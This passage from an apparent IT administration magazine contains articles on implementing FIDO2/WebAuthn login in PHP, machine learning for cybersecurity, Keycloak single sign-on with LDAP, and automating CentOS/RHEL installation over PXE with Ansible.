    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
  }
}

As a concrete use case, I will be looking into passwordless authentication with PHP based on the Lukas Buchs WebAuthn library mentioned above. This exercise assumes that your PHP-based web service is located on a publicly accessible server and that you have already installed a valid certificate for the server (e.g., from Let's Encrypt). As the database, you can use a database management system of your choice; you can also store multiple public keys for each of your users in the database.
As the JavaScript for your web application, use the client.html file in the _test directory of the WebAuthn library and save the functions in a separate file (e.g., fido.js), which you then include on the login page of your web service. You can dispense with the clearregistration() function if you are planning another approach to managing the stored public keys.
If you already have a working application with login capabilities, you need to adjust the paths in the four remaining calls to the window.fetch function. You don't really need the parameters for the HTTP requests coming from the getGetParams() method. The CA certificates are optional, and I do not plan to restrict the choice of security token vendor for the time being.

Queries with GET and POST

With PHP you can easily distinguish between the GET and POST methods. You only need two paths, which you can route to two functions in your web application according to the request method. For example, if the two paths are /fido/create and /fido/login, in /fido/create you use GET to request the parameters to create a new key pair, and you use POST to upload the signature and store the public key on the server. In /fido/login you use the GET method again to request the parameters for the signature and POST to send this signature to the server for authentication.
It is important that you always include the username, which needs to be known to assign the deposited public key to the correct account and log in. You can integrate the username into the path. For example, the path /fido/create/user/Hans would be used to create and upload the public key for user Hans. The next command lets you read the username dynamically from a corresponding input field of your login form and add the values to the previously defined paths:

user_url = 'user/' + (document.getElementById('user').value) + '/';

Depending on whether you have already authenticated the user at the time of reregistration of a public key and recognize them from a valid session, you will only need to specify the user in the URL for the login (i.e., the functions in checkregistration()). Once the paths have been adapted and assuming the username is reliably passed in, the client side is now set up.
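How the routing itself looks depends on your application; as a minimal plain-PHP sketch, dispatching on path and request method could be done as follows. The four handler functions are placeholder names standing in for the four server.php function areas discussed next:

<?php
// dispatch on path and request method; /fido/create and /fido/login
// are the two endpoints defined above
$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$method = $_SERVER['REQUEST_METHOD'];

if (strpos($path, '/fido/create') === 0) {
    // GET delivers the creation parameters, POST stores key and signature
    $method === 'GET' ? fido_create_args() : fido_create_store();
} elseif (strpos($path, '/fido/login') === 0) {
    // GET delivers the challenge, POST verifies the returned signature
    $method === 'GET' ? fido_login_args() : fido_login_verify();
}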
Before making the adjustments on the server side, take a look in the _test folder from the sample WebAuthn application at the server.php file, which has four function areas that you can use for each of the paths mentioned above. The ASCII art rendering of the process in the header of the file again illustrates the process of registration and testing. I will be adopting the four relevant areas for the various endpoints of this example project.
In the upper part of the file, the supported formats are selected on the basis of the HTTP arguments passed in. Because you don't want to limit yourself in terms of the choice of security token at first, you have to pass in all supported devices as an array:

$WebAuthn = new \WebAuthn\WebAuthn('IT-Administrator', 'it-administrator.de', array('fido-u2f', 'packed', 'android-key', 'android-safetynet', 'none'));

To take most of the work off your hands, always create a WebAuthn object first. As a reference, you can pass in an arbitrary name for your application and the domain name as the ID of the relying party. This name is displayed to the user for verification during creation and input.

Creating a Key Pair

The endpoint created in /fido/create lets you create a new key pair. In the process, you will differentiate between the GET and POST methods. First, the JavaScript client uses the GET method. The server uses the following commands to send the required information to the client:

$WebAuthn = new \WebAuthn\WebAuthn('IT-Administrator', 'it-administrator.de', array('fido-u2f', 'packed', 'android-key', 'android-safetynet', 'none'));
$createArgs = $WebAuthn->getCreateArgs($user_id, $nick, $displayname);

The values of the three arguments for getCreateArgs() can also be identical. They only need to be unique for each user because they are used to distinguish different keys on the security token, if the token supports this.

Figure 1: Selecting an authenticator on the smartphone.


To accept the new key, a challenge is sent along, signed on the token, and uploaded with the public key in the second step. The best idea would be to save this challenge in the current user session and then return the parameters created here in JSON format to the JavaScript client to complete the first step:

$_SESSION['fido_challenge'] = $WebAuthn->getChallenge();
print(json_encode($createArgs));
return;

Now the server is waiting for the public key and the first signature to be sent, which can then be verified with the public key. On an Android smartphone, you can now select which authentication method you want to use to unlock the private key locally on the smartphone (Figure 1).
Even if not provided for in the sample application, I recommend that the user additionally specify a name for the token or device in your application so that simple mapping is possible later on. This name is now also transferred to /fido/create in the POST request. In the called method, the generated signature must now be verified with the public key that was also uploaded. To do this, read it from the body of the request as follows and evaluate the JSON it contains accordingly:

$post = trim(file_get_contents('php://input'));
if ($post) {
  $post = json_decode($post);
}

The token also sends a unique credential ID that is used to identify the key pair. This credential ID and the public key are stored in the database for the logged on user. The other values do not need to be stored permanently. To create the object, the challenge is first read from the session:

$challenge = $_SESSION['fido_challenge'];

You might see an error before reading the challenge from the session variable. In fact, this error occurs at session startup when PHP tries to create an object of the \WebAuthn\Binary\ByteBuffer type before the class is known to the script. This error can be remedied by simply including the WebAuthn library before session_start() and preloading the class with use:

require_once 'WebAuthn/WebAuthn.php';
use WebAuthn\Binary\ByteBuffer;

Next, the user information available in Base64 format and the information about the Authenticator need to be decoded, starting a generation process that, if successful, returns a corresponding object if the challenge has a valid signature:

$clientDataJSON = base64_decode($post->clientDataJSON);
$attestationObject = base64_decode($post->attestationObject);
$data = $WebAuthn->processCreate($clientDataJSON, $attestationObject, $challenge);

The required credential ID and the user's public key can now be read from the object in the $data variable. How you store these values in your database depends on your current configuration. However, you will want to change the credential ID's encoding back to Base64 before saving, because many databases do not accept binary data. The public key is in privacy-enhanced mail (PEM) format and is therefore already Base64 encoded:

$credentialId = base64_encode($data->credentialId);
$credentialPublicKey = $data->credentialPublicKey;

Keep in mind that it has to be possible for each user to store multiple public keys. In this way, the user keeps access to their account even if they can no longer use one of the tokens. If you have stored these values appropriately for your database, you are almost done. The JavaScript client accepts an object in JSON and evaluates the success and msg fields:

$return = new stdClass();
$return->success = true;
$return->msg = 'Registration Success';
print(json_encode($return));
return;

This successfully completes the process of generating the key, and you can verify that the two values are stored in the database.

First Login

Now that the public key and the credential ID assigned by the security token are stored in the database, the user can log on to your system. Again, the user first uses GET to request the challenge and other parameters from the application server. Because you do not have a valid session at this time, the JavaScript client in your application needs to query the username or, as described, read it from a login form. Along with the username, which you pass in with the URL for simplicity's sake, all the stored credential IDs of the user can now be read from the database. Remember that these are stored in Base64 encoding; therefore you transmit all stored IDs to the client so it can select a suitable one. You do not need the public key in this call yet. You can now create the challenge with the commands:

$ids = array();
foreach($dbdata AS $credentials){
  $ids[] = base64_decode($credentials['credentialId']);
}
$getArgs = $WebAuthn->getGetArgs($ids);
$_SESSION['challenge'] = $WebAuthn->getChallenge();
print(json_encode($getArgs));
return;

You will have to adapt the variables and indexes in the foreach construct to match your database structure. Now the client can sign the challenge with a security token to match the IDs and POST the signature back to the web application in the body of the request.


The prompt for selecting a security token in Firefox is shown in Figure 2.
Now read the HTTP body of the request again and decode the JSON it contains as shown above. The following commands take the data apart and decode the Base64 data it contains once again:

$clientDataJSON = base64_decode($post->clientDataJSON);
$authenticatorData = base64_decode($post->authenticatorData);
$signature = base64_decode($post->signature);
$credentialId = base64_decode($post->id);

Now find the public key to match the credential ID in your database and store it in the $credentialPublicKey variable. Again, remember that the data in the database is Base64 encoded. If there is no matching key, you need to return a corresponding error. To do so, use an object and the success and msg attributes as shown earlier. If the public key is found, you still need the challenge from the session, which you can then use to perform the check:

$challenge = $_SESSION['challenge'];

$WebAuthn->processGet($clientDataJSON, $authenticatorData, $signature, $credentialPublicKey, $challenge);

This command throws a WebAuthnException if an error occurs during the check; you need to handle this accordingly.
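A minimal sketch of that error handling could look like this; it assumes the library's exception class is \WebAuthn\WebAuthnException, in line with the namespace of the other classes, and reuses the success/msg response convention from the registration step:

try {
  $WebAuthn->processGet($clientDataJSON, $authenticatorData, $signature, $credentialPublicKey, $challenge);
} catch (\WebAuthn\WebAuthnException $e) {
  // verification failed: report the error back to the JavaScript client
  $return = new stdClass();
  $return->success = false;
  $return->msg = $e->getMessage();
  print(json_encode($return));
  return;
}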
Without an error, the user is considered to be logged in. Now you can create all session data, just as after a normal login, and then report success back to the client. You can reload the page with JavaScript or configure a redirection to a subpage.

Other Possible Uses

Once you have completed the development of a FIDO2 login as shown, you will certainly start thinking about many potential adjustments to the process. For example, given the appropriate information, authentication can be implemented without the need to enter usernames. Or you can use FIDO2 as a second factor, just as some online services already make use of its functionality. With Windows 10 and Windows Hello as the authenticator, you can also use FIDO2 on the devices in your Windows domain.

Conclusions

In this article, I showed you how to enable FIDO2-based login for a web service. If you prefer to use languages other than PHP for your web development, you will find similar libraries for them. The principle remains the same, and you do not necessarily have to adapt the JavaScript page of the client. Just try out the different FIDO2 configuration and usage possibilities. n

Figure 2: A Firefox request to use a security token.

Info
[1] Have I Been Pwned: https://haveibeenpwned.com
[2] EIDI project: https://itsec.cs.uni-bonn.de/eidi/ (in German)
[3] FIDO: https://fidoalliance.org/fido2/
[4] WebAuthn demo page: https://webauthn.io
[5] WebAuthn library by Lukas Buchs: https://github.com/lbuchs/WebAuthn


Machine learning and security

Computer Cop
Machine learning can address risks and help defend the IT infrastructure by strengthening and simplifying
cybersecurity. By Andreas Bühlmeier

Although machine learning (ML) applications always put a great deal of effort into preprocessing data, the algorithms can also automatically detect structures. Deep learning in particular has led to further progress in the field of feature extraction, which makes ML algorithms even more interesting, especially for cybersecurity tasks.
In IT security, data volumes are often huge, and interpreting them involves massive effort, either because of the sheer bulk or the complexity. Not surprisingly, then, cybersecurity product vendors often offer special ML toolkits such as Splunk [1] or Darktrace [2], which apparently relies almost entirely on machine learning.
Although machine learning has not suddenly turned the cybersecurity world completely on its head (even if some product vendors believe it has), you need to answer the following questions – if only to stay on top of the latest developments:
- Which machine learning principles apply to cybersecurity?
- What do typical scenarios for defense and attack look like?
- What trends can be expected in the area of combining machine learning and cybersecurity?
In this article, I try to answer these questions, without claiming to be exhaustive.

ML at a Glance

Every ML system (Figure 1) has an input (x) through which it (one hopes) receives relevant information and from which it typically makes a classification (y). In the field of cybersecurity, for example, this would be triggering an alarm or determining that everything is okay.
A target vector (t) or a reward signal (r) is used for adaptation (learning) of system M. This feedback does not exist in unsupervised learning, for which the method uses the statistical properties of the input signals, such as the accumulation of similar input patterns. In machine learning, a basic distinction is made between unsupervised learning, supervised learning, and reinforcement learning.
In unsupervised learning, the system independently identifies patterns in the input data, which allows it to detect unusual events, such as a user suddenly emailing a large volume of data to an address outside the organization. Server logs or a direct stream of network data, for example, serve as input data.

Figure 1: The basic structure of a machine learning system.


In the case of anomalies, the system executes actions according to the specifications defined in playbooks (e.g., informing a cybersecurity team, which then checks to see whether a problem exists or whether an employee has had to perform unusual actions for legitimate tasks).
Supervised learning (Figure 2) requires an assignment of the input and output, wherein the system is presented with examples of log data that should not trigger an alarm and other data that should. For example, you can run some malware in a sandbox and track its actions (e.g., which registry entries it makes). The corresponding log data then provides an example for the Malware_Alert class, and other normal log entries are assigned to the No_Alert class. Typically, however, the logs are not typed in directly as input; instead, the data is first cleaned up and features are extracted – the only way to achieve efficient classification – such as the frequency of certain words.

Figure 2: Processing steps in supervised learning.

The special feature of reinforcement learning is the feedback received by the system. In this context, experts refer to the reward, which is only given after a number of actions. This technique is also known as delayed reinforcement. The idea behind reinforcement learning is that the system interacts with the environment as an agent, much like a sentient being (Figure 3). The agent has to explore the environment and typically only learns after a certain number of actions whether it was successful and will receive a reward.

Figure 3: The reinforcement learning approach: An agent (A) interacts with the environment (U), performing actions on the basis of states and on what has already been learned (Q table). Through a combination of trial and error and the use of experience, the Q table is constantly optimized.

Cybersecurity and ML

The use of machine learning in cybersecurity is based on transforming the security problem into an ML problem or, more generally, into a data science problem. For example, one approach could be to use data generated by malware and by a harmless program to distinguish between the two cases. To do this, you set up an identified malware program on a separate virtual machine and track which logfiles it generates. Similarly, you would collect the logfiles from harmless programs. In this way, you can teach the system to distinguish "good" from "bad" log data through supervised learning.
The principle of logfile classification sounds simple, but it requires intensive preprocessing. For classifiers like neural networks, only numerical values are suitable as input variables – and preferably values between 0 and 1. Therefore, the text information from the log first needs to be coded numerically.
In principle, this just means transforming the security problem (malware detection) into a text recognition problem. In the case of logfile classification, you can then turn to proven algorithms as provided by tried and trusted libraries. For example, the Python sklearn library can be used to transform a problem from textual to numerical, as the short sketch below shows. However, logfile classification is only one of many examples.
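The following minimal sketch shows this text-to-numbers step with sklearn's CountVectorizer; the sample log lines and the choice of a plain bag-of-words representation are illustrative assumptions, not part of the original setup:

from sklearn.feature_extraction.text import CountVectorizer

# toy log lines; in practice these come from sandbox runs and real servers
logs = [
    "registry add HKLM Run evil.exe",
    "user login succeeded from 10.0.0.5",
    "registry add HKLM Run updater.exe",
]

# map each log line to a vector of word counts
# (the counts can then be scaled into the 0-1 range for a neural network)
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(logs)

print(sorted(vectorizer.vocabulary_))  # the extracted vocabulary
print(X.toarray())                     # numerical input for a classifier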
Figure 4 roughly visualizes the approach of the machine learning part in cybersecurity. The breakdown is intended to help provide an overview, but it does not claim to be universally valid.

Figure 4: The machine learning part of cybersecurity.

The starting point (1) is typically a manually identified threat, such as malware or phishing attacks. To identify the threat, you must acquire relevant data (2) (e.g., from operating system or application logfiles). The acquired data is then prepared (3) (e.g., by data science algorithms) for the respective threat scenarios.
In the next step, the data is then further processed by ML algorithms. For selected threat scenarios, one or more algorithms is chosen to prepare for a subsequent alert/no alert decision. Text analysis (4a) helps by combining logfile entries and creating clusters. This technique is used to tag the data as belonging to a pattern class. Feature analysis (4b) is able to detect further patterns in the input data, such as time dependencies.
Deep learning (4c) is another useful variant. Neural networks with an inner structure that contains more than one hidden layer (Figure 5) are referred to as "deep." These networks are particularly well suited for feature extraction, but are more complex to train and interpret. The hidden layers are neurons (shown as circles) that are not directly connected to the output (alert/no alert) or the input data. A deep neural network has more than one such level.

Figure 5: A deep neural network.
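As a minimal sketch, such a network could be defined with Keras as follows; the input size of 100 features and the layer widths are arbitrary assumptions for illustration:

from tensorflow.keras import layers, models

# two hidden layers make this a "deep" network in the sense used above
model = models.Sequential([
    layers.Dense(32, activation='relu', input_shape=(100,)),  # e.g., 100 word frequencies
    layers.Dense(16, activation='relu'),                      # second hidden layer
    layers.Dense(1, activation='sigmoid'),                    # output: alert / no alert
])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.summary()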
Additionally, numerous other procedures can be used (4d in Figure 4), such as decision trees. The end of the process results in a classification (5): Should an alert be triggered?

Experiments

As an alternative to programming your own neural network, you can install trial versions of well-known tools and explore the possibilities of machine learning with the help of their toolkits. For example, you can install and use Splunk Enterprise and its Machine Learning Toolkit (Figure 6) with a trial license for up to 60 days and index up to 500MB of data per day. The software provides a number of examples for different deployment scenarios, including IT security. The installation includes sample data for testing various scenarios.

Figure 6: The Splunk Machine Learning Toolkit offers several showcases for experimentation.

Appropriate data is not always at hand for testing algorithms. Creating the data yourself gives you more control over the degree of randomness you desire. For example, the time series in Figure 7 represents logins. Typically you will see far more logins on workdays and significantly fewer on weekends, showing more or less pronounced fluctuations. Listing 1 shows how such a time series can be generated. The advantage of simulated data is that you can influence individual parameters in a targeted manner, as shown here with the random_gain parameter (lines 25 and 28) in the noise section.

Figure 7: A simulated normalized time series representing the number of logins.

For practical use, you still have to perform tests with real data and handle special cases such as holidays separately. If you want to get more involved in time series prediction, a tutorial from TensorFlow [3] is recommended reading. The idea here is that if you encounter data that the system is unable to predict, you should suspect that a security problem exists.
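The following fragment sketches that idea: a model's forecast is compared with the observed value, and a deviation beyond a tolerance raises an alert. The threshold of 0.2 and the example values are stand-ins for whatever model and tolerance you derive from your own data:

def check_logins(predicted, observed, threshold=0.2):
    # deviation between forecast and reality, on the normalized 0-1 scale
    deviation = abs(predicted - observed)
    if deviation > threshold:
        print('alert: login volume deviates from the prediction')
    return deviation

# example: the model expected a quiet weekend, but logins spiked
check_logins(predicted=0.1, observed=0.7)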

How Attackers Use ML

Machine learning can be used not only to defend against attackers; hackers are also aware of the potential of the technology. The danger of phishing attacks, for example, has increased because fake email is becoming increasingly difficult to distinguish from authentic messages.

Machine learning can further increase the attack quality (e.g., by automatically revealing the similarities in unsupervised learning). In combination with Natural Language Processing (NLP) algorithms, random variations can be built into email so that the individual copies are merely similar but not identical, which makes phishing attacks less easy to detect.
The challenge of reinforcement learning is that the system needs quite a large number of tests to learn the correct behavior. Therefore, the development of such algorithms relies on simulated environments – such as video games – to create the world in which the agent interacts. Hackers would proceed in a similar way and not try to train their agent on the potential victim; this would be far too easy to detect. Instead, they could set up special training environments with standard installations that could then be used to optimize agents. They can also develop attack strategies that a person would not have thought of in this way.

Conclusions

Both machine learning and cybersecurity are already massively important for IT systems and will probably become even more so in the future. Machine learning has the potential to simplify cybersecurity by enabling defense systems to adapt. To do this, the system needs to know what is normal and what is not. Ultimately, the learning system can derive what needs to be done from the actions of a security employee and thus help reduce the workload.
Only the tip of the iceberg is likely visible for the combination of machine learning and cybersecurity. Attackers and defenders will continue to push each other's limits, with solutions maturing in the process – which means it is all the more important to keep up to date. n

Info
[1] Splunk: https://www.splunk.com
[2] Darktrace: https://www.darktrace.com
[3] Time series: https://www.tensorflow.org/tutorials/structured_data/time_series

Listing 1: Creating a Time Series

01 import numpy as np
02 import plotly.graph_objects as go
03
04 step = 1 / 1000; t = np.arange(0, 1, step)  # time vector
05 periods = 30  # number of 'days'
06
07 # function to produce base sine data
08 # with a 7th of the base frequency overlap
09 def data_w_weekend(t):
10     if np.sin(periods / 7 * 2 * np.pi * t) > 0.5:
11         value = 0.001 * np.sin(periods * 2 * np.pi * t)
12         return max(value, 0.0)
13     else:
14         value = np.sin(periods * 2 * np.pi * t)
15         return max(value, 0.0)
16
17 # building the data vector
18 my_data = []
19 i = 0
20 while i < 1000:
21     my_data.append(data_w_weekend(i / 1000))
22     i += 1
23
24 # add some noise
25 random_gain = 0.1  # factor for the noise
26 i = 0
27 while i < 1000:
28     my_data[i] += np.random.rand() * random_gain
29     i += 1
30
31 my_data_max = np.amax(my_data)
32 print('max value is: ' + str(my_data_max))
33 # normalize the data to a range up to 1.0
34 my_norm_data = []
35 i = 0
36 while i < 1000:
37     my_norm_data.append(my_data[i] / my_data_max)
38     i += 1
39
40 # plot the data
41 trace0 = go.Scatter(
42     x = t,
43     y = my_norm_data,
44     name='Logons'
45 )
46 fig = go.Figure()
47
48 layout = go.Layout(title="Logins over time", xaxis={'title':'time'}, yaxis={'title':'occurrences'})
49 fig = go.Figure(data=trace0, layout=layout)
50 fig.show()


Single sign-on with Keycloak

Master of the Keys
Google and Facebook are two of the biggest providers for single sign-on on the web, with OAuth2 and OpenID,
but if you don’t want to put your customers’ or employees’ data in their hands, Red Hat’s Keycloak software lets
you run your own operations with the option of integrating existing Kerberos or LDAP accounts. By Matthias Wübbeling

Single sign-on (SSO) offers many advantages, and SSO providers can provide valuable services in terms of user account security. Although each user only needs to remember one password to access different services (which is not to be confused with a user simply using the same password for different services), the connected services themselves do not have any knowledge of the password used. If a data leak occurs in one of the services, passwords will not fall easily into the hands of criminals. The service exclusively relies on the SSO provider to verify the user's identity securely. For some providers, the identity itself is not important; the only important thing is to identify the same person beyond any doubt.
To use SSO, you are not dependent on the three major players, Google, Facebook, or OpenID. Although you have a number of smaller and specialized providers from which to choose, you can also set up an SSO service yourself. Often the commercial Atlassian Crowd SSO server is used, which acts as the authentication center for Atlassian's own services (e.g., Jira, Confluence, Bitbucket). If you want to set up your own server, you can also start with the open source alternative Keycloak [1]. The software, developed by Red Hat, has been around since 2014 and is currently being developed under the umbrella of the JBoss application server.

DIY SSO

The advantage of operating an SSO server like Keycloak yourself is that you can include virtually any existing directory service. Your users can then use the same credentials as on their domain machines or for accessing email. As the client protocol, Keycloak supports OpenID Connect or the somewhat older SAML (security assertion markup language). If you have the choice, the Keycloak developers recommend OpenID Connect, which is an extension of OAuth 2.0 and offers JSON web tokens, among other things.
To test Keycloak, you can use Docker container version 11 [2], as used for this article, although at print, version 12 was current. To launch the container, use the command:

docker run -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=it-administrator quay.io/keycloak/keycloak:11.0.0

Change the username and password to suit your needs. In addition to the two environment variables specified, the container offers a variety of other configuration options [3], starting with the selection of the database backend and the integration of TLS certificates, as well as clustering options for high availability.
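As a sketch, a start with an external PostgreSQL backend could look like the following; the DB_* variable names are the ones documented for the WildFly-based Keycloak container images, while the host, database name, and credentials are placeholders:

docker run -p 8080:8080 \
  -e KEYCLOAK_USER=admin \
  -e KEYCLOAK_PASSWORD=it-administrator \
  -e DB_VENDOR=postgres \
  -e DB_ADDR=db.example.com \
  -e DB_DATABASE=keycloak \
  -e DB_USER=keycloak \
  -e DB_PASSWORD=secret \
  quay.io/keycloak/keycloak:11.0.0

An external database is advisable for anything beyond testing, because the embedded default database does not survive the loss of the container.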
As soon as the container has started up, you can use your browser to access the welcome page at http://localhost:8080/. Now select Administration Console and log in with the selected user ID.

Configuration

First, familiarize yourself with the interface and adjust the basic configuration in Realm Settings. For example, if you have enabled TLS and want to make it mandatory for logins, check the box in Login | Require SSL.


To configure an email account for Keycloak communications, go to Email. Again, you will want to use TLS or StartTLS. To protect Keycloak against attacks, you can also enable brute force detection under Security Defenses. As with Fail2Ban, you can configure different parameters after enabling.
In the Clients section, configure the applications that can use Keycloak for authentication by assigning a unique name for the application and the client ID, selecting the protocol, and entering the base URL, to which relative paths are then appended. Once you have saved your input, you will be taken to other application settings where you configure valid URLs for forwarding after a successful login, the lifetime of issued tokens, or – under Client Scopes – the attributes and properties of the users your application can access. In the standard case, all client scopes are assigned first. Other configuration of services and the need to access individual user attributes can be adapted to your environment, and access can be tested.

Integrate LDAP

Before you use an LDAP directory as a backend for authentication, you can already create users in the Users menu item. Therefore, Keycloak can theoretically even be used without a directory service in the background. To include an LDAP directory, go to User Federation and select Ldap from the drop-down list. In the following dialog, enter the connection settings for your LDAP server.
The recommendation for testing purposes is to set the Edit mode to READ_ONLY first, so you do not overwrite any settings in your directory. If you want to synchronize new registrations through Keycloak with LDAP, check the Sync Registrations box. Now select your LDAP backend type (e.g., Active Directory); some default settings will be entered for you.
Next, complete the settings marked with a red asterisk. You can accept the suggestions for the attributes first, unless you have defined non-default attributes in your LDAP. You can enter the Connection URL and schema (e.g., ldaps://ldap.example.org:636/ for a TLS-secured connection); then, click Test Connection to check the connection to the LDAP server. Now define the location of the users in the LDAP tree, configure a user with appropriate permissions, test access, and save your changes.

Synchronize with LDAP

The Mappers tab lets you map individual LDAP attributes to Keycloak attributes. To the default mappers, you can add others by pressing the Create button. You will need to create a group-ldap-mapper if you want to map LDAP user groups to user groups in Keycloak. Once set up, Keycloak will do the group mapping for you, just as in LDAP.
In Settings again, select the Synchronize all users button at the bottom. Remember that if you have a large directory, you will have to wait a few moments until all users have been imported. If no users are imported for you, check the attribute settings. If this does not help, check the User Object Classes. Only entries with these classes will be imported. As soon as the users are loaded from LDAP, you will receive a message (Figure 1). You can see how many users have been synchronized and how many failed to import.
Now you can check the imported users in the Users menu item. You will notice that all your users have been assigned another internal Keycloak ID. If you have imported a large number of users, you can use the Search box for a quick search. The Impersonate button lets you log in directly as a specific user.

Test Login

If you have a user account in LDAP, test logging in by trying to log in to the Administration Console. If the login works, you will see a message stating that the access is Forbidden for this user. This information is all you need to test the basic functionality. Now click on your username in the upper right corner to enter the user menu, which takes you to an overview of the applications and active sessions in use.
If you want to use a second factor for login (e.g., Google Authenticator), you can set it up in Authentication. There, grab a shot of the QR code with the smartphone app, enter the currently generated code, and, for the sake of clarity, assign a name to the device you are using. Make sure that the times shown by your server and your device are not too far apart. If you want stricter time tolerance, you can configure this in the Administration Console under Authentication | OTP Policy. Adjust the value for the Look Ahead Window to suit your requirements.

Conclusions

In this article, you got to know Keycloak as the central switchboard for your single sign-on. The test installation is already usable for synchronizing LDAP users and connecting applications. Beyond what is shown here, you will find many more options for configuring identity management in your organization. For example, you can also configure passwordless login with WebAuthn (FIDO2) for your users. n

Info
[1] Keycloak: https://www.keycloak.org
[2] Keycloak containers: https://github.com/keycloak/keycloak-containers/
[3] Container documentation: https://github.com/keycloak/keycloak-containers/blob/11.0.0/server/README.md

Figure 1: Message confirming successful LDAP synchronization.


Automate CentOS and RHEL installation with PXE

Pushbutton
Red Hat delivers an installer that lets you automate the installation of RHEL and CentOS in a preboot execution
environment. By Martin Loschwitz

Extensive frameworks for Puppet, Chef, Ansible, and Salt are found in many setups for both automation and configuration. What happens once a system is installed and accessible over SSH is clearly defined by these frameworks, so how do you convince a computer to transition to this state? Several tool suites deal with the topic of bare metal deployment in different ways; the installation of the operating system, then, is part of a large task package that the respective software processes, as if by magic.
Not everyone wants the overhead of such solutions, but that doesn't mean you have to sacrifice convenience. Linux systems can usually be installed automatically by onboard resources, without a framework or complex abstraction. In this article, I show how Red Hat Enterprise Linux (RHEL, and by analogy CentOS) can be installed automatically by the normal tools of a Linux distribution with a preboot execution environment (PXE). All of the tasks in the deployment chain are addressed.

Initial State

To install the other systems automatically, you clearly require something like a manually installed nucleus. These systems are often referred to as bootstrap nodes or cluster workstations. Essentially, this is all about the infrastructure that enables the automatic installation of Red Hat or CentOS, although it does not include as many services as you might expect. All that is really needed is working name resolution, DHCP, trivial FTP (TFTP), and an HTTP server that provides the required files. If desired, Chrony or Ntpd can be added so that the freshly rolled out servers have the correct time.
In this article, I assume that all services for the operation of an automatic installation framework are running on one system. Ideally, this is a virtual machine (VM) that runs on a high-availability cluster for redundancy reasons. This setup can be easily realized on Linux with onboard resources by a distributed replicated block device (DRBD) and Pacemaker. Both tools are available for CentOS. DRBD and Pacemaker are discussed elsewhere [1] [2], so this part of the setup is left out here: It is not absolutely necessary anyway. If you can live with the fact that the deployment of machines does not work if the VM with the necessary infrastructure fails, you do not need to worry about high availability at this point.
The basis for the system offering bootstrap services for newly installed servers is CentOS in the latest version from the 8.x branch, but the work shown here can be done with RHEL, as well.

Installing Basic Services

As the first step, you need to install CentOS 8 and set it up to suit your requirements, including, among other things, storing an SSH key for your user account and adding it to the wheel group on the system so that the account can use sudo. Additionally, Ansible should be executable on the infrastructure node. Although the operating system of the bootstrap system cannot be installed automatically, nothing can prevent you from using Ansible for rolling out the most important services on this system itself to achieve reproducibility.

Assume you have a CentOS 8 system with a working network configuration, a user who can log in over SSH and use sudo, and Ansible, so that the ansible-playbook command can be executed. To use Ansible, the tool expects a specific structure in your local directory, so the next step is to create a folder named ansible/ in the home directory and then, below this folder, the roles/, group_vars/, and host_vars/ subfolders.
You also need to create an inventory for Ansible in an editor. For this purpose, create the hosts file with the content:

[infra]
<full_hostname_of_the_Ansible_system> ansible_host=<Primary_IP_of_the_system> ansible_user=<login_name_of_admin_user> ansible_ssh_extra_args='-o StrictHostKeyChecking=no'

The entire entry after [infra] must be one long line. You can check whether this works by calling

ansible -i hosts infra -m ping

If Ansible then announces that the connection is working, everything is set up correctly.

Configure DHCP and TFTP

Your next steps are to get the required services running on the infrastructure VM. DHCP, TFTP, and Nginx are all it takes to deliver all the required files to requesting clients.
Of course, you can find ready-made Ansible roles for CentOS- and RHEL-based systems that set up DHCP and TFTP, and I use two roles from Dutch developer Bert van Vreckem, because they work well and can be launched with very little effort (Figure 1). In the roles/ subfolder check out the two Ansible modules from Git (installed with dnf -y install git):

VM> cd roles
VM> git clone https://github.com/bertvv/ansible-role-tftp bertvv.tftp
VM> git clone https://github.com/bertvv/ansible-role-dhcp bertvv.dhcp

In the file host_vars/<Hostname_of_infrastructure_system>.yml, save the configuration of the DHCP server as shown in Listing 1. It is important to get the hostname exactly right. If the full hostname of the system is infrastructure.cloud.internal, the name of the file must be infrastructure.cloud.internal.yml. Additionally, the values of the subnet configured in the file, the global address of the broadcast, and the address of the PXE boot server need to be adapted to the local conditions.
The subnet must be a subrange of the subnet where the VM with the infrastructure services itself is located. However, when configuring the range, you need to make sure the addresses that the DHCP server assigns to requesting clients do not collide with IPs that are already in use locally. It is also important that the value of dhcp_pxeboot_server reflects the IP address of the infrastructure VM (Figure 2); otherwise, downloading the required files over TFTP will fail later.
TFTP is far less demanding than DHCP in terms of its configuration. Bert van Vreckem's module comes with meaningfully selected defaults for CentOS and sets up the TFTP server such that its root directory resides in /var/lib/tftpboot/, which is in line with the usual Linux standard. As soon as the two roles are available locally and you have stored a configuration for DHCP in the host variables, you need to create an Ansible playbook that calls both roles for the infrastructure host. In the example, the playbook is:

- hosts: infra
  become: yes
  roles:
    - bertvv.dhcp
    - bertvv.tftp

Listing 1: Host Variables

dhcp_global_domain_name: cloud.internal
dhcp_global_broadcast_address: 10.42.0.255

dhcp_subnets:
  - ip: 10.42.0.0
    netmask: 255.255.255.0
    domain_name_servers:
      - 10.42.0.10
      - 10.42.0.11
    range_begin: 10.42.0.200
    range_end: 10.42.0.254
    ntp_servers:
      - 10.42.0.10
      - 10.42.0.11

dhcp_pxeboot_server: 10.42.0.12

Figure 1: Automation is useful when it comes to setting up the infrastructure node. Thanks to ready-made roles, the Ansible setup is completed quickly.


Basically, for the Playbooks added in this article, you need to add a new line with the appropriate value to the entries in roles. The role's name matches that of the folder in the roles/ directory (Figure 3).

DHCP and TFTP Rollout

Now it's time to get down to business. Ansible is prepared well enough to roll out the TFTP and DHCP servers. You need to enforce this by typing the command:

ansible-playbook -i hosts infra.yml

The individual work steps of the two Playbooks then flash by on your screen.
If you are wondering why I do not go into more detail concerning the configuration of the firewall (i.e., firewalld), the chosen roles take care of this automatically and open the required ports for the respective services. The use of Ansible and the prebuilt modules definitely saves you some work.

Figure 2: For the DHCP role to know how to set up the DHCP daemon (dhcpd), you need to define the configuration in the host variables of the server with the infrastructure services.

Figure 3: The Playbook for the infrastructure services is simple in its final form – even if the configuration for GRUB and Kickstart can be generated automatically by Ansible.

Move Nginx into Position

Not all files for the automated RHEL or CentOS installation can be submitted to the installer over TFTP. That's not what the protocol is made for. You need to support your TFTP service with an Nginx server that can host the Kickstart files for Anaconda, for example.
